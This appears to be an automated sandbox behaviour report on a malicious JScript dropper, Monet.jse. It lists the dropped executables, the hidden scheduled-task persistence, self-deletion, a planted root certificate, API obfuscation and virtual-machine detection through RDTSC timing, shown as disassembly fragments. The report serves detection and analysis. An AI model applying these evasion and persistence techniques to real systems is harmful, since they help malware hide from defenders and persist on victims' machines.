Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Reads ini files

Show sources

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

SQL strings found in memory and binary data

Show sources

Source: svchost.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Sample requires command line parameters (based on API chain)

Show sources

Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess			graph_13-898
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess			graph_17-920

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\Monet.jse' 578
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\431846743.exe 'C:\Users\user\AppData\Local\Temp\431846743.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {09EF86CB-0344-4609-A443-6612E4A0A019} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\431846743.exe 'C:\Users\user\AppData\Local\Temp\431846743.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32

Jump to behavior

Writes ini files

Show sources

Source: C:\Windows\System32\svchost.exe

File written: C:\Users\user\AppData\Roaming\WinNetCore\settings.ini

Jump to behavior

Data Obfuscation:

Potential obfuscated javascript found

Show sources

Source: Monet.jse

Initial file: High amount of function use 1673

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800949E0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

36_2_00000001800949E0

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800C5F85 push rbx; iretd

36_2_00000001800C5F86

Persistence and Installation Behavior:

Yara detected PersistenceViaHiddenTask

Show sources

Source: Yara match	File source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3172, type: MEMORY
Source: Yara match	File source: Process Memory Space: taskeng.exe PID: 3388, type: MEMORY

Drops PE files

Show sources

Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\431846743.exe			Jump to dropped file

Boot Survival:

Yara detected PersistenceViaHiddenTask

Show sources

Source: Yara match	File source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3172, type: MEMORY
Source: Yara match	File source: Process Memory Space: taskeng.exe PID: 3388, type: MEMORY

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\monet.jse

Jump to behavior

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49203

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Code function: 13_2_00401A57 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,		13_2_00401A57
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Code function: 17_2_00401A57 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,		17_2_00401A57

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800B6170 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

36_2_00000001800B6170

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\svchost.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Stores large binary data to the registry

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\System32\svchost.exe

Function Chain: fileOpened,fileOpened,fileCreated,fileWritten,threadDelayed,fileOpened,fileRead,handleClosed,fileOpened,fileRead,threadCreated,threadDelayed,sectionLoaded,sectionLoaded,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 xor edx, edx 0x0000000b div esi 0x0000000d mov ebx, edx 0x0000000f test ebp, ebp 0x00000011 je 2AA5968Ch 0x00000013 mov ecx, dword ptr [edi+ebx*4] 0x00000016 lea eax, dword ptr [ebp+01h] 0x00000019 test ecx, ecx 0x0000001b jne 2AA59327h 0x0000001d mov ebp, eax 0x0000001f call 2AA42696h 0x00000024 dec eax 0x00000025 sub esp, 28h 0x00000028 call dword ptr [0001BF96h] 0x0000002e jmp 2AA59350h 0x00000030 jmp dword ptr [0007C47Ah] 0x00000036 mov ecx, dword ptr [7FFE0004h] 0x0000003d dec eax 0x0000003e mov eax, dword ptr [7FFE0320h] 0x00000045 dec eax 0x00000046 imul eax, ecx 0x00000049 dec eax 0x0000004a shr eax, 18h 0x0000004d ret 0x0000004e mov ecx, eax 0x00000050 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59513h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59150h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59150h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
